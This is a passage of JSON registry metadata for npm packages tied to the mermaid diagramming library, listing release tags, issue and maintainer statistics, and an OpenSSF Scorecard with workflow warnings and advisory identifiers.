,"sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:50.355Z","dependent_packages_count":0,"downloads":11,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":24.886701693703696,"dependent_packages_count":35.92719617777702,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.40694893574036},"purl":"pkg:npm/mermaid-es6","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/mermaid-es6","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/mermaid-es6","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/mermaid-es6/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid-es6/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid-es6/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid-es6/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid-es6/related_packages","maintainers":[{"uuid":"space777","login":"space777","name":null,"email":"1130483391@qq.com","url":null,"packages_count":8,"html_url":"https://www.npmjs.com/~space777","role":null,"created_at":"2025-04-02T07:15:18.442Z","updated_at":"2025-04-02T07:15:18.442Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/space777/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":7896879,"name":"@mermaid-js/mermaid-zenuml","ecosystem":"npm","description":"MermaidJS plugin for ZenUML integration","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","zenuml","mermaid"],"namespace":"mermaid-js","versions_count":7,"first_release_published_at":"2023-06-12T16:49:16.883Z","latest_release_published_at":"2025-08-19T08:05:00.929Z","latest_release_number":"0.2.2","last_synced_at":"2025-09-01T12:55:57.520Z","created_at":"2023-07-06T06:57:24.401Z","updated_at":"2025-09-01T14:17:50.353Z","registry_url":"https://www.npmjs.com/package/@mermaid-js/mermaid-zenuml","install_command":"npm install @mermaid-js/mermaid-zenuml","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"0.2.0-rc.1","latest":"0.2.2"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl"